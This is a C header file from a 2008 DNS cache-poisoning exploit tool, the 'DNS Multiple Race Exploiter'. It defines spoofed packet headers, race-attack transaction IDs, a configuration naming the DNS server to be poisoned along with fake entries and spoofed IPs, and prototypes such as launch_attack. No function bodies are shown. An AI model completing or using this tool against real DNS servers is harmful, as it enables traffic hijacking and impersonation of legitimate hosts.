/*
 * Project: DNS Multiple Race Exploiter
 * File Name: dns_mre.h
 *
 * Copyright (c) 2008 AR <ar@securebits.org>
 * Securebits [www.securebits.org]
 * ALL RIGHTS RESERVED.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/* Includes */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>

/* Definitions */
#define Q_S_PORT	2345	/* Query Source Port */
#define Q_D_PORT	53		/* Query Destination Port */
#define R_S_PORT	53		/* Reply Source Port */
#define R_D_PORT	1103	/* Reply Destination Port */
#define QTXID		0x1234	/* Query Transaction ID */
#define RTXID		{0xABED, 0xAB0D, 0xAB1D, 0xABCD, 0xA5ED, 0xA61D, 0x1BED, 0xABE9, 0xABAD, 0xABBD}

/* Reply Transaction ID */
#define DNS_QUERY	0x0000	/* DNS Standard Query */
#define DNS_RESP	0x8000	/* DNS Standard Query Response */
#define DNS_REC		0x0100	/* DNS Recursion Desired */
#define DNS_RECA	0x0080	/* DNS Recursion Available */
#define QFLAGS		0x0100	/* Query Flags */
#define RFLAGS		0x8180	/* Reply Flags */
#define DNS_TYPE_A	0x0001	/* DNS RR Type A (Host) */
#define DNS_TYPE_NS	0x0002	/* DNS RR Type NS (Name Server */
#define DNS_TYPE_CN	0x0005	/* DNS RR Type CNAME (Canonical Name) */
#define DNS_TYPE_SA	0x0006	/* DNS RR Type SOA (Start of Authority) */
#define DNS_TYPE_MX	0x000F	/* DNS RR Type MX (Main Exchange) */
#define DNS_TYPE_PR	0x000C	/* DNS RR Type PTR (Domain Name Pointer) */
#define DNS_CLS_IN	0x0001	/* DNS RR Class IN (Internet Address) */
#define RAW_PS		200		/* Maximum Raw Packet Size */
#define IP4_SIZE	20		/* IP4 Header Size */
#define UDP_SIZE	8		/* UDP Header Size */
#define UDP_PSDS	12		/* UDP Pseudo Header Size */
#define WAIT_1		100		/* Milliseconds */
#define WAIT_2		100		/* Milliseconds */

/* Types */
typedef unsigned int	u_int32_t;
typedef unsigned short	u_int16_t;
typedef unsigned char	u_int8_t;

/* Structures */
typedef struct additional_RR{
	u_int16_t		name;
	u_int16_t		type;
	u_int16_t		clss;
	u_int32_t		ttl;
	u_int16_t		length;
	u_int32_t		addr;
}__attribute__((__packed__)) additional_RR;

typedef struct authority_RR{
	u_int16_t		name;
	u_int16_t		type;
	u_int16_t		clss;
	u_int32_t		ttl;
	u_int16_t		length;
}__attribute__((__packed__)) authority_RR;

typedef struct query_RR{
	u_int16_t		type;
	u_int16_t		clss;
} __attribute__((__packed__)) query_RR;

typedef struct answer_RR{
	u_int16_t		name;
	u_int16_t		type;
	u_int16_t		clss;
	u_int32_t		ttl;
	u_int16_t		length;
	u_int32_t		addr;
}__attribute__((__packed__)) answer_RR;

typedef struct cname_RR{
	u_int16_t		name;
	u_int16_t		type;
	u_int16_t		clss;
	u_int32_t		ttl;
	u_int16_t		length;
}__attribute__((__packed__)) cname_RR;

typedef struct name{
	u_int8_t		length;
	char *			name_part;
	struct name *	next;
}name;

typedef struct fqdn{
	int				count;
	int				size;
	struct name *	first_part;
	struct name *	part;
}fqdn;

typedef struct dns_hdr{
	u_int16_t		txid;
	u_int16_t		flags;
	u_int16_t		qst_count;
	u_int16_t		ans_count;
	u_int16_t		ath_count;
	u_int16_t		adt_count;
}__attribute__((__packed__)) dns_hdr;

typedef struct udp_hdr{
	u_int16_t		sport;
	u_int16_t		dport;
	u_int16_t		length;
	u_int16_t		checksum;
}__attribute__((__packed__)) udp_hdr;

typedef struct udp_pseudo_hdr{
	u_int32_t	src_ip;
	u_int32_t	dst_ip;
	u_int16_t	res_proto;
	u_int16_t	length;
}__attribute__((__packed__)) udp_pseudo_hdr;

typedef struct ip4_hdr{
	u_int8_t		ver_len;
	u_int8_t		tos;
	u_int16_t		total_len;
	u_int16_t		id;
	u_int16_t		flags_off;
	u_int8_t		ttl;
	u_int8_t		protocol;
	u_int16_t		checksum;
	u_int32_t		src_ip;
	u_int32_t		dst_ip;
}__attribute__((__packed__)) ip4_hdr;

struct { /* Configuration Structure */
	char		*dns_server_ip;		/* The Server IP to be Poisoned */
	char		*dns_entry_name;	/* Fake DNS Entry Hostname */
	char		*dns_entry_ip;		/* Fake DNS Entry IP Address */
	char		*name_server;		/* Spoofed Name Server IP */
	char		*spoofed_ip;		/* Spoofed Local IP */
	int			type;				/* Attack Type: Patched/Unpatched */
	int			verbosity;			/* Verbosity Level */
	int			add_rr;				/* Additional Resource Record (RR) */
	int			ath_rr;				/* Authority Resource Record (RR) */
	int			txids;				/* Number of TXIDs to use */
	int			mode;				/* Attack Mode: Forwarding DNS, Recursive DNS */
	u_int16_t	port;				/* Static Port Address */
}cfg;

/* Function prototypes */
int initialize( int *, int * );
int prepare_raw_one( u_int8_t *, int );
int prepare_raw_array( u_int8_t **, int );
int launch_attack( int, u_int8_t *, int, int, u_int8_t **, int );
int prepare_ip4( u_int8_t *, int, int );
int prepare_udp( u_int8_t *, int, int );
int prepare_dns( u_int8_t *, int, int );
int send_packet( int, u_int8_t *, int, struct sockaddr_in );
u_int16_t checksum( u_int16_t *, int );
int udp_checksum();
int usage( char * );
int check_poison();
int clean();

/* Global variables */
struct sockaddr_in	q_s_addr;	/* Query Source Address */
struct sockaddr_in	q_d_addr;	/* Query Destination Address */
struct sockaddr_in	r_s_addr;	/* Reply Source Address */
struct sockaddr_in	r_d_addr;	/* Reply Source Address */
struct fqdn *		hostname;	/* the hostname used in the queries */
struct fqdn *		entryname;	/* The DNS entry name - DNS Style */


